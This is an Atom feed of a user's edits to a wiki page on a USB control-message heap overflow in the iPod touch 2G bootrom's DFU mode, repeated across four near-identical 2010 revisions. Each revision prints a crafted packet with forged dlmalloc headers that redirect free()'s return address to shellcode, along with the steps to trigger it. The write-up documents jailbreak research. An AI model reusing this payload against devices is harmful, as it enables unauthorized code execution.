https://www.theiphonewiki.com/w/api.php?action=feedcontributions&feedformat=atom&user=ArjanvThe iPhone Wiki - User contributions [en]2026-06-14T18:08:20ZUser contributionsMediaWiki 1.31.14https://www.theiphonewiki.com/w/index.php?title=Usb_control_msg(0xA1,_1)_Exploit&diff=10716Usb control msg(0xA1, 1) Exploit2010-10-18T13:01:06Z<p>Arjanv: /* Credit (Alphabetical) */</p>
<hr />
<div>{{DISPLAYTITLE:usb_control_msg(0xA1, 1) Exploit}}<br />
A heap overflow exists in the [[N72ap|iPod touch 2G]] (both [[iBoot-240.4|old]] and [[iBoot-240.5.1|new]]) [[S5L8720 (Bootrom)|bootrom]]'s [[DFU Mode]] when sending a USB control message of request type 0xA1, request 0x1.<br />
<br />
On newer devices, the same USB message triggers a double free() when the image upload is marked as finished, also rebooting the device (but that's not exploitable because the double free() happens in a row). [[User:posixninja|posixninja]] analyzed and explained this one.<br />
<br />
== Credit (Alphabetical) ==<br />
* '''vulnerability''': [[User:pod2g|pod2g]]<br />
* '''exploitation''': [[User:pod2g|pod2g]]<br />
* '''payload''': [http://greenpois0n.com Greenpois0n RC4]: both the old [[iBoot-240.4]] and [[iBoot-240.5.1]]<br />
]<br />
<br />
== Vulnerability ==<br />
By fuzzing all possible USB control messages of the [[N72ap|iPod touch 2G]]'s [[DFU Mode]], it appeared that one special usb control message made it reboot.<br />
The reboot happens only with lengths bigger than 0x100 bytes. It's a buffer overflow.<br />
<br />
== Exploitation ==<br />
In order to exploit it, send this special USB packet (using 0x21, 1) :<br />
<br />
<pre><br />
[ 0x100 bytes of nulls ]<br />
/* free'd buffer dlmalloc header: */<br />
0x84, 0x00, 0x00, 0x00, // 0x00: previous_chunk<br />
0x05, 0x00, 0x00, 0x00, // 0x04: next_chunk<br />
/* free'd buffer contents: (malloc'd size=0x1C, real size=0x20, see sub_9C8) */<br />
0x80, 0x00, 0x00, 0x00, // 0x08: (0x00) direction<br />
0x80, 0x62, 0x02, 0x22, // 0x0c: (0x04) usb_response_buffer<br />
0xff, 0xff, 0xff, 0xff, // 0x10: (0x08)<br />
0x00, 0x00, 0x00, 0x00, // 0x14: (0x0c) data size (_replace with packet size_)<br />
0x00, 0x01, 0x00, 0x00, // 0x18: (0x10)<br />
0x00, 0x00, 0x00, 0x00, // 0x1c: (0x14)<br />
0x00, 0x00, 0x00, 0x00, // 0x20: (0x18)<br />
0x00, 0x00, 0x00, 0x00, // 0x24: (0x1c)<br />
/* attack dlmalloc header: */<br />
0x15, 0x00, 0x00, 0x00, // 0x28: previous_chunk<br />
0x02, 0x00, 0x00, 0x00, // 0x2c: next_chunk : 0x2 choosed randomly :-)<br />
0x01, 0x38, 0x02, 0x22, // 0x30: FD : shellcode_thumb_start()<br />
0x90, 0xd7, 0x02, 0x22, // 0x34: BK : free() LR in stack<br />
</pre><br />
<br />
Then trigger the exploit by using USB control message 0xA1, 1 with the same data size.<br />
<br />
free() LR in stack will be replaced by FD, a pointer to the shellcode to execute!<br />
<br />
Note: FD[0xc] will also be overwritten by BK (because of the free() unlink code), the first instruction of the shellcode<br />
shall jump to FD[0x10] to skip the junk.<br />
<br />
[[Category:Exploits]]</div>Arjanvhttps://www.theiphonewiki.com/w/index.php?title=Usb_control_msg(0xA1,_1)_Exploit&diff=10715Usb control msg(0xA1, 1) Exploit2010-10-18T13:00:24Z<p>Arjanv: /* Credit (Alphabetical) */</p>
<hr />
<div>{{DISPLAYTITLE:usb_control_msg(0xA1, 1) Exploit}}<br />
A heap overflow exists in the [[N72ap|iPod touch 2G]] (both [[iBoot-240.4|old]] and [[iBoot-240.5.1|new]]) [[S5L8720 (Bootrom)|bootrom]]'s [[DFU Mode]] when sending a USB control message of request type 0xA1, request 0x1.<br />
<br />
On newer devices, the same USB message triggers a double free() when the image upload is marked as finished, also rebooting the device (but that's not exploitable because the double free() happens in a row). [[User:posixninja|posixninja]] analyzed and explained this one.<br />
<br />
== Credit (Alphabetical) ==<br />
* '''vulnerability''': [[User:pod2g|pod2g]]<br />
* '''exploitation''': [[User:pod2g|pod2g]]<br />
* '''payload''': * [http://greenpois0n.com Greenpois0n RC4]: both the old [[iBoot-240.4]] and [[iBoot-240.5.1]<br />
]<br />
<br />
== Vulnerability ==<br />
By fuzzing all possible USB control messages of the [[N72ap|iPod touch 2G]]'s [[DFU Mode]], it appeared that one special usb control message made it reboot.<br />
The reboot happens only with lengths bigger than 0x100 bytes. It's a buffer overflow.<br />
<br />
== Exploitation ==<br />
In order to exploit it, send this special USB packet (using 0x21, 1) :<br />
<br />
<pre><br />
[ 0x100 bytes of nulls ]<br />
/* free'd buffer dlmalloc header: */<br />
0x84, 0x00, 0x00, 0x00, // 0x00: previous_chunk<br />
0x05, 0x00, 0x00, 0x00, // 0x04: next_chunk<br />
/* free'd buffer contents: (malloc'd size=0x1C, real size=0x20, see sub_9C8) */<br />
0x80, 0x00, 0x00, 0x00, // 0x08: (0x00) direction<br />
0x80, 0x62, 0x02, 0x22, // 0x0c: (0x04) usb_response_buffer<br />
0xff, 0xff, 0xff, 0xff, // 0x10: (0x08)<br />
0x00, 0x00, 0x00, 0x00, // 0x14: (0x0c) data size (_replace with packet size_)<br />
0x00, 0x01, 0x00, 0x00, // 0x18: (0x10)<br />
0x00, 0x00, 0x00, 0x00, // 0x1c: (0x14)<br />
0x00, 0x00, 0x00, 0x00, // 0x20: (0x18)<br />
0x00, 0x00, 0x00, 0x00, // 0x24: (0x1c)<br />
/* attack dlmalloc header: */<br />
0x15, 0x00, 0x00, 0x00, // 0x28: previous_chunk<br />
0x02, 0x00, 0x00, 0x00, // 0x2c: next_chunk : 0x2 choosed randomly :-)<br />
0x01, 0x38, 0x02, 0x22, // 0x30: FD : shellcode_thumb_start()<br />
0x90, 0xd7, 0x02, 0x22, // 0x34: BK : free() LR in stack<br />
</pre><br />
<br />
Then trigger the exploit by using USB control message 0xA1, 1 with the same data size.<br />
<br />
free() LR in stack will be replaced by FD, a pointer to the shellcode to execute!<br />
<br />
Note: FD[0xc] will also be overwritten by BK (because of the free() unlink code), the first instruction of the shellcode<br />
shall jump to FD[0x10] to skip the junk.<br />
<br />
[[Category:Exploits]]</div>Arjanvhttps://www.theiphonewiki.com/w/index.php?title=Usb_control_msg(0xA1,_1)_Exploit&diff=10714Usb control msg(0xA1, 1) Exploit2010-10-18T12:59:46Z<p>Arjanv: /* Credit (Alphabetical) */</p>
<hr />
<div>{{DISPLAYTITLE:usb_control_msg(0xA1, 1) Exploit}}<br />
A heap overflow exists in the [[N72ap|iPod touch 2G]] (both [[iBoot-240.4|old]] and [[iBoot-240.5.1|new]]) [[S5L8720 (Bootrom)|bootrom]]'s [[DFU Mode]] when sending a USB control message of request type 0xA1, request 0x1.<br />
<br />
On newer devices, the same USB message triggers a double free() when the image upload is marked as finished, also rebooting the device (but that's not exploitable because the double free() happens in a row). [[User:posixninja|posixninja]] analyzed and explained this one.<br />
<br />
== Credit (Alphabetical) ==<br />
* '''vulnerability''': [[User:pod2g|pod2g]]<br />
* '''exploitation''': [[User:pod2g|pod2g]]<br />
* '''payload''': * [http://greenpois0n.com Greenpois0n RC4: both the old [[iBoot-240.4]] and [[iBoot-240.5.1]]<br />
]<br />
<br />
== Vulnerability ==<br />
By fuzzing all possible USB control messages of the [[N72ap|iPod touch 2G]]'s [[DFU Mode]], it appeared that one special usb control message made it reboot.<br />
The reboot happens only with lengths bigger than 0x100 bytes. It's a buffer overflow.<br />
<br />
== Exploitation ==<br />
In order to exploit it, send this special USB packet (using 0x21, 1) :<br />
<br />
<pre><br />
[ 0x100 bytes of nulls ]<br />
/* free'd buffer dlmalloc header: */<br />
0x84, 0x00, 0x00, 0x00, // 0x00: previous_chunk<br />
0x05, 0x00, 0x00, 0x00, // 0x04: next_chunk<br />
/* free'd buffer contents: (malloc'd size=0x1C, real size=0x20, see sub_9C8) */<br />
0x80, 0x00, 0x00, 0x00, // 0x08: (0x00) direction<br />
0x80, 0x62, 0x02, 0x22, // 0x0c: (0x04) usb_response_buffer<br />
0xff, 0xff, 0xff, 0xff, // 0x10: (0x08)<br />
0x00, 0x00, 0x00, 0x00, // 0x14: (0x0c) data size (_replace with packet size_)<br />
0x00, 0x01, 0x00, 0x00, // 0x18: (0x10)<br />
0x00, 0x00, 0x00, 0x00, // 0x1c: (0x14)<br />
0x00, 0x00, 0x00, 0x00, // 0x20: (0x18)<br />
0x00, 0x00, 0x00, 0x00, // 0x24: (0x1c)<br />
/* attack dlmalloc header: */<br />
0x15, 0x00, 0x00, 0x00, // 0x28: previous_chunk<br />
0x02, 0x00, 0x00, 0x00, // 0x2c: next_chunk : 0x2 choosed randomly :-)<br />
0x01, 0x38, 0x02, 0x22, // 0x30: FD : shellcode_thumb_start()<br />
0x90, 0xd7, 0x02, 0x22, // 0x34: BK : free() LR in stack<br />
</pre><br />
<br />
Then trigger the exploit by using USB control message 0xA1, 1 with the same data size.<br />
<br />
free() LR in stack will be replaced by FD, a pointer to the shellcode to execute!<br />
<br />
Note: FD[0xc] will also be overwritten by BK (because of the free() unlink code), the first instruction of the shellcode<br />
shall jump to FD[0x10] to skip the junk.<br />
<br />
[[Category:Exploits]]</div>Arjanvhttps://www.theiphonewiki.com/w/index.php?title=Usb_control_msg(0xA1,_1)_Exploit&diff=10713Usb control msg(0xA1, 1) Exploit2010-10-18T12:58:18Z<p>Arjanv: /* Credit (Alphabetical) */</p>
<hr />
<div>{{DISPLAYTITLE:usb_control_msg(0xA1, 1) Exploit}}<br />
A heap overflow exists in the [[N72ap|iPod touch 2G]] (both [[iBoot-240.4|old]] and [[iBoot-240.5.1|new]]) [[S5L8720 (Bootrom)|bootrom]]'s [[DFU Mode]] when sending a USB control message of request type 0xA1, request 0x1.<br />
<br />
On newer devices, the same USB message triggers a double free() when the image upload is marked as finished, also rebooting the device (but that's not exploitable because the double free() happens in a row). [[User:posixninja|posixninja]] analyzed and explained this one.<br />
<br />
== Credit (Alphabetical) ==<br />
* '''vulnerability''': [[User:pod2g|pod2g]]<br />
* '''exploitation''': [[User:pod2g|pod2g]]<br />
* '''payload''': * [http://greenpois0n.com Greenpois0n RC4 has support for this on both the old iBoot 2.40 and the new iBoot 2.40-2]<br />
<br />
== Vulnerability ==<br />
By fuzzing all possible USB control messages of the [[N72ap|iPod touch 2G]]'s [[DFU Mode]], it appeared that one special usb control message made it reboot.<br />
The reboot happens only with lengths bigger than 0x100 bytes. It's a buffer overflow.<br />
<br />
== Exploitation ==<br />
In order to exploit it, send this special USB packet (using 0x21, 1) :<br />
<br />
<pre><br />
[ 0x100 bytes of nulls ]<br />
/* free'd buffer dlmalloc header: */<br />
0x84, 0x00, 0x00, 0x00, // 0x00: previous_chunk<br />
0x05, 0x00, 0x00, 0x00, // 0x04: next_chunk<br />
/* free'd buffer contents: (malloc'd size=0x1C, real size=0x20, see sub_9C8) */<br />
0x80, 0x00, 0x00, 0x00, // 0x08: (0x00) direction<br />
0x80, 0x62, 0x02, 0x22, // 0x0c: (0x04) usb_response_buffer<br />
0xff, 0xff, 0xff, 0xff, // 0x10: (0x08)<br />
0x00, 0x00, 0x00, 0x00, // 0x14: (0x0c) data size (_replace with packet size_)<br />
0x00, 0x01, 0x00, 0x00, // 0x18: (0x10)<br />
0x00, 0x00, 0x00, 0x00, // 0x1c: (0x14)<br />
0x00, 0x00, 0x00, 0x00, // 0x20: (0x18)<br />
0x00, 0x00, 0x00, 0x00, // 0x24: (0x1c)<br />
/* attack dlmalloc header: */<br />
0x15, 0x00, 0x00, 0x00, // 0x28: previous_chunk<br />
0x02, 0x00, 0x00, 0x00, // 0x2c: next_chunk : 0x2 choosed randomly :-)<br />
0x01, 0x38, 0x02, 0x22, // 0x30: FD : shellcode_thumb_start()<br />
0x90, 0xd7, 0x02, 0x22, // 0x34: BK : free() LR in stack<br />
</pre><br />
<br />
Then trigger the exploit by using USB control message 0xA1, 1 with the same data size.<br />
<br />
free() LR in stack will be replaced by FD, a pointer to the shellcode to execute!<br />
<br />
Note: FD[0xc] will also be overwritten by BK (because of the free() unlink code), the first instruction of the shellcode<br />
shall jump to FD[0x10] to skip the junk.<br />
<br />
[[Category:Exploits]]</div>Arjanv